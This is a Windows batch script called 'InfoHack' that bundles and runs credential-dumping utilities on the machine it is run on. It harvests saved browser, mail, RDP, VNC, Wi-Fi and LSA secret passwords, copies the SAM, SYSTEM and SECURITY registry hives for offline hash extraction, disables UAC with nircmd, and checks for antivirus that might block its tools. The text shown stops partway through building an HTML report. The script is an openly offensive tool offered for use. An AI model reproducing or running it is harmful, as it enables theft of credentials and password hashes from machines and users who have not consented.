@Echo off
cls
::Common Variables
::---------------------------------------------------------------------------------------------------------
setlocal
set starttime=%time%
set TimeStamp=[%date%][%starttime%]
set title=InfoHack --- %username% --- %userdomain% %TimeStamp%
Title %title%
set ihver=v1.0_Alpha10
set Directory="Info_%username%_%userdomain%"
set win=Unknown
set SUBecho=call :SUBroot
set LogFile=Log.txt
set nopause=Disabled
set spy=Disabled
set autoexit=Disabled
set comp=%cd%\components
Set Timestampfile=0
set noreg=0
set filepass=0
set help=0
set noAutorunsMode=0 
set displayNameXPFW=0
set NoUsbDump=0
set xpwmic=WMIC.EXE

::Input Interpreter 
::---------------------------------------------------------------------------------------------------------
:IHstart

::if %autoexit%==Disabled echo %* 2>&1|findstr /i /r /c:"-sx">nul
::if %autoexit%==Disabled IF "%errorlevel%"=="0" (goto spyx)

::if %spy%==Disabled echo %* 2>&1|findstr /i /r /c:"-s">nul
::if %spy%==Disabled IF "%errorlevel%"=="0" (goto spy)

if %help%==0 echo %* 2>&1|findstr /i /r /c:"-h">nul
if %help%==0 IF "%errorlevel%"=="0" (goto help)
if %help%==0 echo %* 2>&1|findstr /i /r /c:"/h">nul
if %help%==0 IF "%errorlevel%"=="0" (goto help)
if %help%==0 echo %* 2>&1|findstr /i /r /c:"-help">nul
if %help%==0 IF "%errorlevel%"=="0" (goto help)

if %NoUsbDump%==0 echo %* 2>&1|findstr /i /r /c:"-nusb">nul
if %NoUsbDump%==0 IF "%errorlevel%"=="0" (set NoUsbDump=1)

if %noAutorunsMode%==0 echo %* 2>&1|findstr /i /r /c:"-na">nul
if %noAutorunsMode%==0 IF "%errorlevel%"=="0" (set noAutorunsMode=1)

if %nopause%==Disabled echo %* 2>&1|findstr /i /r /c:"-np">nul
if %nopause%==Disabled IF "%errorlevel%"=="0" (set nopause=Enabled)

if %noreg%==0 echo %* 2>&1|findstr /i /r /c:"-nr">nul
if %noreg%==0 IF "%errorlevel%"=="0" (set noreg=1)

if %Timestampfile%==0 echo %* 2>&1|findstr /i /r /c:"-ts">nul
if %Timestampfile%==0 IF "%errorlevel%"=="0" (set Directory="Info_%username%_%userdomain%_[%starttime:~0,2%;%starttime:~3,2%;%starttime:~6,2% %date:~-10,4%-%date:~-5,2%-%date:~-2,2%]")
if %Timestampfile%==0 echo %* 2>&1|findstr /i /r /c:"-ts">nul
if %Timestampfile%==0 IF "%errorlevel%"=="0" (set Timestampfile=1)

if %filepass%==0 echo %* 2>&1|findstr /i /r /c:"-p:">nul
if %filepass%==0 IF "%errorlevel%"=="0" (set filepass=1)
if %filepass%==1 for /f "tokens=2 delims=:" %%a in ('echo %* 2^>^&1^|findstr /i /r /c:"-p:"') do set Passw=%%a
if %filepass%==1 for /f "tokens=1 delims= " %%a in ('echo %passw%') do set Passw=%%a
shift

set PrecleanOnExitFail=NotFound
If EXIST %LogFile% (set PrecleanOnExitFail=Found)
if "%PrecleanOnExitFail%"=="Found" goto preclean

::Log And Echo Start
::---------------------------------------------------------------------------------------------------------
:IHlogStart
cls
%SUBecho% -log "----------------------------------------------------------------------"
%SUBecho% -log "InfoHack %ihver%			By DarkPhoeniX --- KGB Systems"
::Kenetic Genuis Box - Systems
%SUBecho% -log "----------------------------------------------------------------------"
::read only media test now checks for the log file
if not exist %LogFile% goto WriteMediaError

%SUBecho% -log "Hack Type: %*"
%SUBecho% -log "-------------------------------------------------------"



if %NoUsbDump%==1 %SUBecho% -log "No USB Dump: Enabled"
if %noAutorunsMode%==1 %SUBecho% -log "No Autoruns Mode: Enabled"
if %filepass%==1 %SUBecho% -log "Encrypt output File: Enabled"
if %filepass%==1 %SUBecho% -log "Encrypt Password: %Passw%"
if %noreg%==1 %SUBecho% -log "No Reg: Enabled"
if %Timestampfile%==1 %SUBecho% -log "TimeStamp File: Enabled"
if %nopause%==Enabled %SUBecho% -log "No-Pause: %nopause%"
if %spy%==Enabled %SUBecho% -log "Spy-Mode: %spy%"
if %autoexit%==Enabled %SUBecho% -log "Auto-Exit: %autoexit%"
%SUBecho% -log "TimeStamp: %TimeStamp%"
IF NOT "%OS%"=="Windows_NT" GOTO BadWindowsVer



if exist %Directory%.7z (del %Directory%.7z /f /q)
if exist %Directory%\InfoHack.html (goto preclean) else goto MakeDirectory

:preclean
If EXIST %LogFile% (del "%LogFile%" /f /q)>nul
%SUBecho% -log "Cleaning Old %username% InfoHack"
if "%PrecleanOnExitFail%"=="Found" %SUBecho% -log "-FailCleanMode-"
del %Directory%\*.* /f /q >nul
del %Directory%\html\*.* /f /q >nul
del %comp%\*.* /f /q >nul
If EXIST wmicXP.exe (del "wmicXP.exe" /f /q)>nul
rmdir /s %Directory%\html\ /q >nul
rmdir /s %Directory%\ /q >nul
rmdir /s %comp%\ /q >nul
if "%PrecleanOnExitFail%"=="Found" goto IHlogStart



:MakeDirectory
echo.
%SUBecho% -log "Creating %username% InfoHack:"
%SUBecho% -log "-------------------------------------------------------"
md %Directory%
md %Directory%\html



::Check Bit Type
::---------------------------------------------------------------------------------------------------------
Set sys=Unknown
if %processor_architecture% == x86 (set sys=32)
if %processor_architecture% == AMD64 (set sys=64)
%SUBecho% -log "Detected Bit Type:		 %sys% Bit"
::if %processor_architecture% == x86 (set NircmdType=Nircmd32.exe) else set NircmdType=Nircmd64.exe
if "%sys%"=="Unknown" (goto BitCheckError)

::Windows Version Finder
::---------------------------------------------------------------------------------------------------------

ver | find "4.">nul
IF NOT errorlevel 1 (set win=Windows_NT_4) && set winver=old && goto BadWindowsVer
ver | find "5.00.">nul
IF NOT errorlevel 1 (set win=Windows_2000) && set winver=old && goto BadWindowsVer
ver | find "5.1.">nul
IF NOT errorlevel 1 (set win=Windows_XP) && set winver=old && goto SettingsCheck
ver | find "5.2.">nul
IF NOT errorlevel 1 (set win=Windows_Server_2003) && set winver=old && goto SettingsCheck
ver | find "6.0.">nul
IF NOT errorlevel 1 (set win=Windows_Vista) && set winver=new && goto SettingsCheck
ver | find "6.1.">nul
IF NOT errorlevel 1 (set win=Windows_7) && set winver=new && goto SettingsCheck
ver | find "6.2.">nul
IF NOT errorlevel 1 (set win=Windows_8) && set winver=new && goto SettingsCheck
if "%win%"=="Unknown" goto BadWindowsVer
goto BadWindowsVer


:SettingsCheck
FOR /F "tokens=2*" %%A IN ('REG.EXE QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /V "ProductName" 2^>NUL ^| Find "REG_SZ"') Do Set winRegver=%%B
%SUBecho% -log "Windows Reg Ver:		 %winRegver%"

if "%winver%"=="old" goto XPCheck
if "%win%"=="Windows_Vista" goto VistaCheck
if "%win%"=="Windows_Server_2008" goto VistaCheck
if "%win%"=="Windows_7" goto 7Check
if "%win%"=="Windows_8" goto 7Check

::Windows XP settings check
::----------------------------------------------------------------------------------
:XPCheck

If not EXIST %SystemRoot%\System32\wbem\wmic.exe (set xpwmic=wmicXP.exe)
If not EXIST %SystemRoot%\System32\wbem\wmic.exe (7za e Components.7z wmicXP.exe -pPASSWORD -y -o"%comp%\")>nul
If not EXIST %SystemRoot%\System32\wbem\wmic.exe (copy "%comp%\wmicXP.exe" "%cd%\" /v /y)>nul

If not EXIST %SystemRoot%\System32\wbem\Cli.mof (7za e Components.7z Cli.mof -pPASSWORD -y -o"%comp%\")>nul
If not EXIST %SystemRoot%\System32\wbem\cliegaliases.mof (7za e Components.7z cliegaliases.mof -pPASSWORD -y -o"%comp%\")>nul
If not EXIST %SystemRoot%\System32\wbem\cliegaliases.mfl (7za e Components.7z cliegaliases.mfl -pPASSWORD -y -o"%comp%\")>nul
If not EXIST %SystemRoot%\System32\wbem\textvaluelist.xsl (7za e Components.7z textvaluelist.xsl -pPASSWORD -y -o"%comp%\")>nul
If not EXIST %SystemRoot%\System32\wbem\xsl-mappings.xml (7za e Components.7z xsl-mappings.xml -pPASSWORD -y -o"%comp%\")>nul

If not EXIST %SystemRoot%\System32\wbem\Cli.mof (copy /y /V "%comp%\cli.mof" "%SystemRoot%\System32\wbem\")>nul
If not EXIST %SystemRoot%\System32\wbem\cliegaliases.mof (copy /y /V "%comp%\cliegaliases.mof" "%SystemRoot%\System32\wbem\")>nul
If not EXIST %SystemRoot%\System32\wbem\cliegaliases.mfl (copy /y /V "%comp%\cliegaliases.mfl" "%SystemRoot%\System32\wbem\")>nul
If not EXIST %SystemRoot%\System32\wbem\textvaluelist.xsl (copy /y /V "%comp%\textvaluelist.xsl" "%SystemRoot%\System32\wbem\")>nul
If not EXIST %SystemRoot%\System32\wbem\xsl-mappings.xml (copy /y /V "%comp%\xsl-mappings.xml" "%SystemRoot%\System32\wbem\")>nul


FOR /F "tokens=2 delims==" %%A IN ('%xpwmic% /Node:"%userdomain%" /Namespace:\\root\cimv2 Path Win32_OperatingSystem Get CSDVersion^ /Format:List ^| FIND "="') DO SET SP=%%A
%SUBecho% -log "Service Pack Ver:		 %SP%"
goto SecCheck

::Windows Vista settings check
::----------------------------------------------------------------------------------

:VistaCheck
FOR /F "tokens=2 delims==" %%A IN ('WMIC.EXE /Node:"%userdomain%" /Namespace:\\root\cimv2 Path Win32_OperatingSystem Get CSDVersion^ /Format:List ^| FIND "="') DO SET SP=%%A
%SUBecho% -log "Service Pack Ver:		 %SP%"

Reg Query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA | find "0x0">nul
IF errorlevel 1 (goto UacOnMenu)
goto UacIsOff

::windows 7 settings check
::----------------------------------------------------------------------------------

:7Check
FOR /F "tokens=2 delims==" %%A IN ('WMIC.EXE /Node:"%userdomain%" /Namespace:\\root\cimv2 Path Win32_OperatingSystem Get CSDVersion^ /Format:List ^| FIND "="') DO SET SP=%%A
%SUBecho% -log "Service Pack Ver:		 %SP%"

Reg Query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA | find "0x0">nul
IF errorlevel 1 (goto UacOnMenu)
goto UacIsOff

::Uac Settings Menu
::-------------------------------------------------------------------------------------------------------
:UacOnMenu
echo.


%SUBecho% -log "      --- Warning ---      "
%SUBecho% -log "The Windows UAC:		 On"
if %nopause%==Enabled (goto UacOffCancel)
%SUBecho% -log "Some Tools May Not Work"
%SUBecho% -log "Do you Want to Turn Off The UAC"
%SUBecho% -log "Switshing off the UAC Will Need a Reboot"
%SUBecho% -log "----------------------------------------"
echo (Y) To launch UAC Settings (Recommended)
echo (N) To Cancel
echo.
SET /P C=[Y,N]?
for %%? in (y) do if /I "%C%"=="%%?" goto launchUAC
for %%? in (Y) do if /I "%C%"=="%%?" goto launchUAC
for %%? in (n) do if /I "%C%"=="%%?" goto UacOffCancel
for %%? in (N) do if /I "%C%"=="%%?" goto UacOffCancel
%SUBecho% -log "Incorect Selection"
goto UacOnMenu

:launchUAC
if "%win%"=="Windows_Vista" goto VistaUacRestart

%SUBecho% -log "Launching User Account Control Settings"
Start %SystemRoot%\System32\UserAccountControlSettings.exe
goto uacmenu

:VistaUacRestart
%SUBecho% -log "Switshing The Uac Off"
7za e Components.7z nircmd.exe -pPASSWORD -y -o"%comp%\">nul
"%comp%\nircmd.exe" elevatecmd regsetval dword "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" "EnableLUA" "0"
Goto uacmenu

:uacmenu
cls
echo.
%SUBecho% -log "Press Any key Reboot"
%SUBecho% -log "--------------------"
Pause >nul
goto uacRestart

:uacRestart
%SUBecho% -log "System Restart Send"
Shutdown /r /t 2 /c "UAC Settings Changed, Restart to take Effect"
%SUBecho% -log "Exiting InfoHack"
%SUBecho% -log "----------------"
exit

:UacOffCancel
%SUBecho% -log "Windows UAC Turn off Skiped"
Goto SecCheck

:UacIsOff
%SUBecho% -log "The Windows UAC:		 Off"
Goto SecCheck

::Antivirus Securety Check
::----------------------------------------------------------------------------------


:SecCheck
echo.
%SUBecho% -log "Checking for a Antivirus:"
%SUBecho% -log "-------------------------"
if %winver%==old goto SecurityCenter1
if %winver%==new goto SecurityCenter2

goto noAVFound

::----------------------------------------------------------------------------------

:SecurityCenter1
::set displayName=noav
::Antivirus
FOR /F "tokens=*" %%A IN ('%xpwmic% /Node:"%Computername%" /Namespace:\\root\SecurityCenter Path AntiVirusProduct Get companyName^,displayName^,onAccessScanningEnabled^,productUptoDate^,versionNumber /Format:List ^| FIND "="') DO SET %%A
IF /I "%productUptoDate%"=="TRUE" (
	SET productUptoDate=Yes
) ELSE (
	SET productUptoDate=No
)
IF /I "%onAccessScanningEnabled%"=="TRUE" (
	SET onAccessScanningEnabled=Yes
) ELSE (
	SET onAccessScanningEnabled=No
)

Set companyNameXPAV=%companyName%
set displayNameXPAV=%displayName%
set productUptoDateXPAV=%productUptoDate%
set onAccessScanningEnabledXPAV=%onAccessScanningEnabled%
set versionNumberXPAV=%versionNumber%

set companyName=
set displayName=
set productUptoDate=
set onAccessScanningEnabled=
set versionNumber=

::FireWall
%SUBecho% -log "Checking for a FireWall App:"
%SUBecho% -log "----------------------------"

FOR /F "tokens=*" %%A IN ('%xpwmic% /Node:"%Computer%" /Namespace:\\root\SecurityCenter Path FirewallProduct Get companyName^,displayName^,enabled^,versionNumber /Format:List ^| FIND "="') DO SET %%A
IF /I "%enabled%"=="TRUE" (
	SET enabled=Yes
) ELSE (
	SET enabled=No
)

Set companyNameXPFW=%companyName%
set displayNameXPFW=%displayName%
set enabledXPFW=%enabled%
set versionNumberXPFW=%versionNumber%

set companyName=
set displayName=
set enabled=
set versionNumber=

if "%displayNameXPFW%"=="" (set displayNameXPFW=0) else set displayNameXPFW=1
if "%displayNameXPAV%"=="" (goto noAVFound) else goto FoundAV
if "%displayName%"=="" (goto noAVFound) else goto FoundAV

:SecurityCenter2
set flagAV=0
for /f "delims=" %%i in ('WMIC /NODE:"%userdomain%" /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct GET displayName^,productState /FORMAT:List^|findstr "="') do set "%%i"
cmd /c exit %productState%
set /a "Byte1=0x%=ExitCode:~2,2% , Byte2=0x%=ExitCode:~4,2% , Byte3=0x%=ExitCode:~-2%"
set /a "flagAV=(Byte1>>2)%%2"
set /a "flagScan=(Byte2>>4)%%2"
set /a "flagOutOfDate=(Byte3>>4)%%2"

if %flagAV%==1 (set flagAV=On) else set flagAV=Off
if %flagScan%==1 (set flagScan=On) else set flagScan=Off
if %flagOutOfDate%==1 (set flagOutOfDate=Yes) else set flagOutOfDate=No



::if %flagAV%==1 (goto FoundAV) else goto FoundAV

if "%displayName%"=="" (goto noAVFound) else goto FoundAV


::----------------------------------------------------------------------------------

:FoundAV
%SUBecho% -log "--- Warning A Antivirus Has Been Found ---"
%SUBecho% -log "      --- Some Tools May Not Work ---"
%SUBecho% -log "------------------------------------------"
if %winver%==old (%SUBecho% -log "Antivirus:		 %displayNameXPAV%")
if %winver%==old (%SUBecho% -log "Company Name:		 %companyNameXPAV%")
if %winver%==old (%SUBecho% -log "Up To Date:		 %productUptoDateXPAV%")
if %winver%==old (%SUBecho% -log "Scan Enabled:		 %onAccessScanningEnabledXPAV%")
if %winver%==old (%SUBecho% -log "Version Number:		 %versionNumberXPAV%")
if %winver%==old Echo.
if %displayNameXPFW%==1 (%SUBecho% -log "FireWall:		 %displayNameXPAV%")
if %displayNameXPFW%==1 (%SUBecho% -log "Company Name:		 %companyNameXPAV%")
if %displayNameXPFW%==1 (%SUBecho% -log "Enabled:		 %enabledXPFW%")
if %displayNameXPFW%==1 (%SUBecho% -log "Version Number:		 %versionNumberXPAV%")

if %winver%==new (%SUBecho% -log "Antivirus Name:		 %displayName%")
if %winver%==new (%SUBecho% -log "Antivirus Status:	 %flagAV%")
if %winver%==new (%SUBecho% -log "Scanning enabled:	 %flagScan%")
if %winver%==new (%SUBecho% -log "DB Out Of Date:		 %flagOutOfDate%")


Goto AvCheck_End

:noAVFound
%SUBecho% -log "No Antivirus Found"

:AvCheck_End

::Components Extractor
::---------------------------------------------------------------------------------------------------------
echo.
%SUBecho% -log "Extracting Components:"
%SUBecho% -log "----------------------"
7za e Components.7z -pPASSWORD -y -o"%comp%\">nul
 %SUBecho% -log "        --- Done"

::Windows Tools Dump
::---------------------------------------------------------------------------------------------------------
echo.
%SUBecho% -log "Standerd Windows Tools:"
%SUBecho% -log "-----------------------"
:WinStart

set ExeName=SystemInfo
:WinRepeat
if "%M%"=="1" (set OutputName=%OutputName%) else set OutputName=%ExeName%
%SUBecho% -log "Dumping --- %OutputName%"
if "%FindEXE%"=="No" %ExeName% %Paramaters% > %Directory%/html/%ExeName%.txt
if "%FindEXE%"=="No" goto FindOutput


set InputFile=NotFound
If EXIST "%SystemRoot%\System32\%ExeName%.exe" (set InputFile=Found)
if "%InputFile%"=="NotFound" %SUBecho% -log "        --- Cannot Find %ExeName%.exe, Using Backup %ExeName%xp.exe"
if "%InputFile%"=="NotFound" goto findBackup
if "%InputFile%"=="Found" "%ExeName%.exe" %Paramaters% > %Directory%/html/%OutputName%.txt
goto FindOutput
:findBackup
set InputFile2=NotFound
If EXIST "%comp%\%ExeName%xp.exe" (set InputFile2=Found)
if "%InputFile2%"=="NotFound" %SUBecho% -log "        --- Error Cannot Find %ExeName%xp.exe, Skiped"
if "%InputFile2%"=="NotFound" goto WinRepeat_End
if "%InputFile2%"=="Found" %SUBecho% -log "        --- Backup Found, Copying"
if "%InputFile2%"=="Found" copy "%comp%\%ExeName%xp.exe" "%cd%\" /v /y >nul
set CopyCheck=NotFound
If EXIST "%cd%\%ExeName%xp.exe" (set CopyCheck=Found)
if "%CopyCheck%"=="NotFound" %SUBecho% -log "        --- Cannot Find %ExeName%xp.exe in Root, Copy Error Occurred, Skiped"
if "%CopyCheck%"=="NotFound" goto WinRepeat_End
if "%CopyCheck%"=="Found" %SUBecho% -log "        --- Copy OK"
if "%CopyCheck%"=="Found" "%ExeName%xp.exe" %Paramaters% > %Directory%/html/%OutputName%.txt
if "%CopyCheck%"=="Found" del "%ExeName%xp.exe" /f /q
:FindOutput
set OutputFile=NotFound
If EXIST %Directory%/html/%OutputName%.txt (set OutputFile=Found)
if "%OutputFile%"=="NotFound" %SUBecho% -log "        --- Cannot Find %OutputName%.txt, Write Error Occurred"
if "%OutputFile%"=="Found" %SUBecho% -log "        --- OK"
:WinRepeat_End
set Paramaters=
set FindEXE=
if "%M%"=="1" (set m= ) && goto %OutputName%_End
Goto %ExeName%_End
:SystemInfo_End
set ExeName=TaskList
goto WinRepeat
:TaskList_End
set ExeName=IpConfig
set Paramaters=  /all
goto WinRepeat
:IpConfig_End
set ExeName=Set
set FindEXE=No
goto WinRepeat
:Set_End
Set OutputName=NetView
set ExeName=Net
set Paramaters= View
set M=1
goto WinRepeat
:NetView_End

Set OutputName=NetShare
set ExeName=Net
set Paramaters= Share
set M=1
goto WinRepeat
:NetShare_End

Set OutputName=NetAccounts
set ExeName=Net
set Paramaters= Accounts
set M=1
goto WinRepeat
:NetAccounts_End

Set OutputName=NetUser
set ExeName=Net
set Paramaters= User
set M=1
goto WinRepeat
:NetUser_End

::NirTools Dump 32
::---------------------------------------------------------------------------------------------------------

echo.
%SUBecho% -log "NirSoft Tools 32bit:"
%SUBecho% -log "--------------------"
:Nir32Start

set ExeName=WebBrowserPassView
:Nir32Repeat
%SUBecho% -log "Dumping --- %ExeName%"
set InputFile=NotFound
If EXIST "%comp%\%ExeName%.exe" (set InputFile=Found)
if "%InputFile%"=="NotFound" %SUBecho% -log "        --- Error Missing %ExeName%.exe, Check Antivirus or Extraction Failed"
if "%InputFile%"=="NotFound" goto Nir32Repeat_End
if "%InputFile%"=="Found" "%comp%\%ExeName%.exe" /shtml %Directory%/html/%ExeName%.html %Paramaters%

set OutputFile=NotFound
If EXIST %Directory%/html/%ExeName%.html (set OutputFile=Found)
if "%OutputFile%"=="NotFound" %SUBecho% -log "        --- Cannot Find %ExeName%.html, Write Error Occurred"
if "%OutputFile%"=="Found" %SUBecho% -log "        --- OK"
:Nir32Repeat_End
set Paramaters=
Goto %ExeName%_End

:WebBrowserPassView_End
set ExeName=DialuPass
goto Nir32Repeat
:DialuPass_End
set ExeName=IeHv
goto Nir32Repeat
:IeHv_End
set ExeName=MailPv
goto Nir32Repeat
:MailPv_End
set ExeName=MsPass
goto Nir32Repeat
:MsPass_End
set ExeName=MyLastSearch
goto Nir32Repeat
:MyLastSearch_End
set ExeName=NetPass
goto Nir32Repeat
:NetPass_End
set ExeName=ProduKey
goto Nir32Repeat
:ProduKey_End
set ExeName=PsPv
goto Nir32Repeat
:PsPv_End
set ExeName=RdPv
goto Nir32Repeat
:RdPv_End
set ExeName=VNCPassView
goto Nir32Repeat
:VNCPassView_End
set ExeName=WirelessKeyView
goto Nir32Repeat_End
:WirelessKeyView_End
set ExeName=DriveLetterView
goto Nir32Repeat
:DriveLetterView_End
set ExeName=LiveContactsView
goto Nir32Repeat
:LiveContactsView_End
set ExeName=LSASecretsView
goto Nir32Repeat
:LSASecretsView_End
set ExeName=MonitorInfoView
goto Nir32Repeat
:MonitorInfoView_End
set ExeName=SkypeLogView
goto Nir32Repeat
:SkypeLogView_End
set ExeName=DiskCountersView
goto Nir32Repeat
:DiskCountersView_End
set ExeName=FaView
goto Nir32Repeat
:FaView_End
set ExeName=RecentFilesView
goto Nir32Repeat
:RecentFilesView_End
set ExeName=UserProfilesView
goto Nir32Repeat
:UserProfilesView_End
set ExeName=DiskSmartView
goto Nir32Repeat
:DiskSmartView_End
set ExeName=MyEventViewer
Set Paramaters= /ShowOnlyLastEvents 1 /LastEventsValue 3 /LastEventsUnit 3 /sort "~Time"
goto Nir32Repeat
:MyEventViewer_End
set ExeName=BlueScreenView
Set Paramaters= /sort "~Crash Time"
goto Nir32Repeat
:BlueScreenView_End
if %NoUsbDump%==1 goto USBDeview_end
set ExeName=USBDeview
goto Nir32Repeat
:USBDeview_end
set ExeName=Cports
goto Nir32Repeat
:cports_end

::NirTools Dump 64
::---------------------------------------------------------------------------------------------------------
if "%sys%"=="32" goto SysinternalsDumpStart
echo.
%SUBecho% -log "NirSoft Tools 64bit:"
%SUBecho% -log "--------------------"
:Nir64Start

set ExeName=WirelessKeyView64
:Nir64Repeat
%SUBecho% -log "Dumping --- %ExeName%"
set InputFile=NotFound
If EXIST "%comp%\%ExeName%.exe" (set InputFile=Found)
if "%InputFile%"=="NotFound" %SUBecho% -log "        --- Error Missing %ExeName%.exe, Check Antivirus or Extraction Failed"
if "%InputFile%"=="NotFound" goto Nir64Repeat_End
if "%InputFile%"=="Found" "%comp%\%ExeName%.exe" /shtml %Directory%/html/%ExeName%.html %Paramaters%

set OutputFile=NotFound
If EXIST %Directory%/html/%ExeName%.html (set OutputFile=Found)
if "%OutputFile%"=="NotFound" %SUBecho% -log "        --- Cannot Find %ExeName%.html, Write Error Occurred"
if "%OutputFile%"=="Found" %SUBecho% -log "        --- OK"
:Nir64Repeat_End
set Paramaters=
Goto %ExeName%_End

:WirelessKeyView64_End
set ExeName=NetPass64
goto Nir64Repeat
:NetPass64_End
set ExeName=LSASecretsView64
goto Nir64Repeat
:LSASecretsView64_End
set ExeName=ProduKey64
goto Nir64Repeat
:ProduKey64_End
set ExeName=MyEventViewer64
Set Paramaters= /ShowOnlyLastEvents 1 /LastEventsValue 3 /LastEventsUnit 3 /sort "~Time"
goto Nir64Repeat
:MyEventViewer64_End
if %NoUsbDump%==1 goto USBDeview64_end
set ExeName=USBDeview64
goto Nir64Repeat
:USBDeview64_end
set ExeName=Cports64
goto Nir64Repeat
:cports64_end






::Sysinternals Dump
::---------------------------------------------------------------------------------------------------------

:SysinternalsDumpStart

echo.
%SUBecho% -log "Sysinternals Tools:"
%SUBecho% -log "-------------------"
:SysinternalsStart
if %noAutorunsMode%==0 (set ExeName=Autoruns) else set ExeName=CoreInfo
if %noAutorunsMode%==0 (set Paramaters=  -a "%Directory%/html/%ExeName%.arn")
if %noAutorunsMode%==0 (set ARN=Yes)
:SysinternalsRepeat
%SUBecho% -log "Dumping --- %ExeName%"
set InputFile=NotFound
If EXIST "%comp%\%ExeName%.exe" (set InputFile=Found)
if "%InputFile%"=="NotFound" %SUBecho% -log "        --- Error Missing %ExeName%.exe, Check Antivirus or Extraction Failed"
if "%InputFile%"=="NotFound" goto SysinternalsRepeat_End
if "%ARN%"=="Yes" %SUBecho% -log "        --- Starting autoruns"
if "%ARN%"=="Yes" "%comp%\%ExeName%.exe" -accepteula %Paramaters%
if "%ARN%"=="Yes" %SUBecho% -log "        --- Closing autoruns" 
if "%ARN%"=="Yes" goto SysinternalsOutputCheck
if "%InputFile%"=="Found" "%comp%\%ExeName%.exe" -accepteula %Paramaters% > %Directory%/html/%ExeName%.txt
:SysinternalsOutputCheck
set OutputFile=NotFound
If EXIST %Directory%/html/%ExeName%.arn (set OutputFile=Found)
If EXIST %Directory%/html/%ExeName%.txt (set OutputFile=Found)
if "%OutputFile%"=="NotFound" %SUBecho% -log "        --- Cannot Find %ExeName%, Write Error Occurred"
if "%OutputFile%"=="Found" %SUBecho% -log "        --- OK                                            "
:SysinternalsRepeat_End
set Paramaters=
set ARN=
Goto %ExeName%_End

:Autoruns_End
set ExeName=CoreInfo
goto SysinternalsRepeat
:CoreInfo_End
set ExeName=ListDlls
goto SysinternalsRepeat
:ListDlls_End
set ExeName=logonSessions
set Paramaters=  -p
goto SysinternalsRepeat
:logonSessions_End
set ExeName=PsInfo
set Paramaters=  -s -d -h
goto SysinternalsRepeat
:PsInfo_End

::Other Tools Dump
::---------------------------------------------------------------------------------------------------------
echo.
%SUBecho% -log "Other Tools:"
%SUBecho% -log "------------"

%SUBecho% -log "Dumping --- Restore Point List"
for /f "Tokens=*" %%a in ('cscript //nologo "%comp%\erp.vbs"') do (
echo %%a >> %Directory%/html/RestorePointList.txt
)
set OutputFile=NotFound
If EXIST %Directory%/html/RestorePointList.txt (set OutputFile=Found)
if "%OutputFile%"=="NotFound" %SUBecho% -log "        --- Missing RestorePointList.txt, Write Error Occurred"
if "%OutputFile%"=="Found" %SUBecho% -log "        --- OK"

%SUBecho% -log "Dumping --- BIOS Info"
FOR /F "tokens=*" %%A IN ('%xpwmic% /Node:"%userdomain%" /Namespace:\\root\cimv2 Path Win32_BIOS Get Name^,Version^,Manufacturer^,SMBIOSBIOSVersion^ /Format:List ^| FIND "="') DO echo %%A >> %Directory%/html/BIOS.txt
set OutputFile=NotFound
If EXIST %Directory%/html/BIOS.txt (set OutputFile=Found)
if "%OutputFile%"=="NotFound" %SUBecho% -log "        --- Missing BIOS.txt, Write Error or No Instances Availibale"
if "%OutputFile%"=="Found" %SUBecho% -log "        --- OK"

%SUBecho% -log "Dumping --- Pinter List"
FOR /F "tokens=2 delims==" %%A IN ('%xpwmic% /Node:"%userdomain%" /Namespace:\\root\cimv2 Path Win32_Printer Get DeviceID /Format:List ^| FIND "="') DO echo %%A >> %Directory%/html/PinterList.txt
::Call "%comp%\PrintShow.cmd" /list > %Directory%/html/PinterList.txt
set OutputFile=NotFound
If EXIST %Directory%/html/PinterList.txt (set OutputFile=Found)
if "%OutputFile%"=="NotFound" %SUBecho% -log "        --- Missing PinterList.txt, Write Error or No Instances Availibale"
if "%OutputFile%"=="Found" %SUBecho% -log "        --- OK"






::Regestry Dumper 64 and 32
::---------------------------------------------------------------------------------------------------------
echo.
%SUBecho% -log "Regestry Dump:"
%SUBecho% -log "--------------"

if %noreg%==1 %SUBecho% -log "        --- Skip (No-Reg-Mode)"
if %noreg%==1 goto htmlhead

Set Hobocopy=0

if "%sys%"=="32" goto DumpReg32 
if "%sys%"=="64" goto DumpReg64
goto DumpRegStart

:DumpReg32
if "%winver%"=="old " (goto RegXP)
Set Hobocopy=hobocopy32
goto DumpRegStart

:DumpReg64
Set Hobocopy=hobocopy64
goto DumpRegStart

:RegXP
Set Hobocopy=hobocopyXP
goto DumpRegStart

:DumpRegStart
if "%Hobocopy%"=="0" goto RegDumpError

%SUBecho% -log "Dumping --- ntuser.dat"
"%comp%\%Hobocopy%.exe" "%Homedrive%%homepath%" %Directory%\html\Regestry ntuser.dat >nul
If EXIST %Directory%/html/Regestry/ntuser.dat (%SUBecho% -log "        --- OK") else %SUBecho% -log "        --- Write Error Occurred"
%SUBecho% -log "Dumping --- sam"
"%comp%\%Hobocopy%.exe" "%systemroot%\system32\config" %Directory%\html\Regestry sam >nul
If EXIST %Directory%/html/Regestry/sam (%SUBecho% -log "        --- OK") else %SUBecho% -log "        --- Write Error Occurred"
%SUBecho% -log "Dumping --- system"
"%comp%\%Hobocopy%.exe" "%systemroot%\system32\config" %Directory%\html\Regestry system >nul
If EXIST %Directory%/html/Regestry/system (%SUBecho% -log "        --- OK") else %SUBecho% -log "        --- Write Error Occurred"
%SUBecho% -log "Dumping --- software"
"%comp%\%Hobocopy%.exe" "%systemroot%\system32\config" %Directory%\html\Regestry software >nul
If EXIST %Directory%/html/Regestry/software (%SUBecho% -log "        --- OK") else %SUBecho% -log "        --- Write Error Occurred"
%SUBecho% -log "Dumping --- security"
"%comp%\%Hobocopy%.exe" "%systemroot%\system32\config" %Directory%\html\Regestry security >nul
If EXIST %Directory%/html/Regestry/security (%SUBecho% -log "        --- OK") else %SUBecho% -log "        --- Write Error Occurred"
attrib -r -a -s -h %Directory%\html\Regestry\*.* >nul

goto RegDumpEnd
:RegDumpError
%SUBecho% -log "Error Dumping regestry files For This Windows"
goto RegDumpEnd

:RegDumpEnd


::HTML Head Creator
::---------------------------------------------------------------------------------------------------------
:htmlhead
echo.
%SUBecho% -log "Creating HTML Index"
%SUBecho% -log "-------------------"
:: --------------------------------------------------------------------------------------------------------------------------------------
(
echo ^<html^>
echo ^<head^>
echo   ^<meta http-equiv="content-type" content="text/html; charset=UTF-8" /^>
echo   ^<style type="text/css"^>
echo   body, th { font-family:tahoma, verdana, arial, helvetica, sans; font-weight:normal; font-size:9pt; }
